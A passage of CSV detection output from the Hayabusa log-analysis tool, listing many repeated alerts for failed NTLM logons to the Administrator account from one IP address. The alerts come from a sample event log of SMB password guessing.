+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Dp5dq3YYmmLxperL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: klkWqfYoNQQHRISX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.092 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q0EekPO3q6qRfq3i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.144 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfG1x6sL4Aqlj7TK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.185 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: owSUehMmDEhijkfl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J3xBPT5WiuvmPZHe | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.264 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIufEPz8FBVd5yKe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.309 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6Blruxd110NvZjof | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0VsPitzItsjU3Y59 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HEq6vk4nTe3weSOP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.507 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lE8kvmcQtCmlsqtT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.548 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IXmfjxrGC3liZ2oh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.589 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72JLcUBrhOoXPLzD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sRoFpK2ZvBYy4jGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.676 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9KReiI3k2WIKpxFq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.722 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsfSzPbji6ARhU0k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: axeCxygvJ4zL4Xoq | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.809 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y64sc51Y7vbiFTIQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o395tRQcfRBTTCSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.892 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K1R4wlYWS4SkM3dF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.938 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RsZy0Yjvk720Mu22 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:07.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c8RusStjhReKBmS0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.026 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eJuPYLTcGaGvErLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: raCbua01mzU1Djuf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fnt8atAbMtxXivUs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.165 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: psokvQJyMn5m5rMh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.210 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wTPGqOITsOhpTgIF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xxhGrLzhwNziihc9 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.296 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UIb1lHuPaC62UlBp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.338 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2uvXuLIR9yvmWngF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.382 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MI35CCybjNtntfwo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.426 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GTJfOkk0fUC5YCX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.456 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jk6PsiAiLPsHGUh1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.496 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KeGDMp9My5eLJz55 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.541 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BvDQphjvwOCsNQqB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sbJhad4aocvPMYVP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.635 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJl3XqTUxvqiKKaG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.693 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a1fAJDfguuoNxWiR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.841 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: daAeGcsqoqERsEu6 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.908 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0iynnwxS8v4C5b3E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.955 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2kU7IS4XCvgRpTff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:08.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MBC8AJXBQHrCMrO2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.049 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NSGraDQmI4MAq9Ls | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B7u2Pb9y8hB0iYWh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.132 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A657rbd6k4AD7M4i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7rkiDUBuTCU2jDXR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jjsCFTQoobrkQoWF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2dNXav95nZyBhVOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yeq1x56Ct6R2Nu3J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pUwyCNtwydEQu2bd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bX7eihAOk3PUgbwM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.442 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WPXqAsaYaXEr8I9L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4SaEmIpmlH1VMDun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.534 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3Dvp43a2h7Mzx2H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.575 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: g3voKlRXc7rIaIYs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.629 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GF1Q5OhCLRAi96mN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.669 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: caHe4iY2CQoiumQI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.734 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SJi6UAm6Pp6eax8Q | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2EW0t2wapD8yniO4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.872 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PnaITXTihpB0stwx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.913 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tdBVoa82WKEAW2ce | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:09.953 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BelKzJrEjGIcU2dN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ujeb7fRHPGCGmFm2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Czwt7KF2sQHemwdJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LQQ4nNpbfKKVCJZH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.157 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6jwIc6e0AHAhXKK5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.200 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Nld9Job0Ll1Fgtmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.242 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q9sS6i9iU3PXhokz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: heaYv6Np8swhoVc9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.334 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I7rzgNBtUJkS93pO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.381 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gh45suNQ09FzPBjd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.431 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BOnwAGxxz994k6Ee | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.474 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L26mvUKOgGptcKaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aqldRjcLl8KFZr5h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:10.569 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ycNPBtmRHShPOcRA | IP Addr: 192.168.198.149 | AuthPackage: 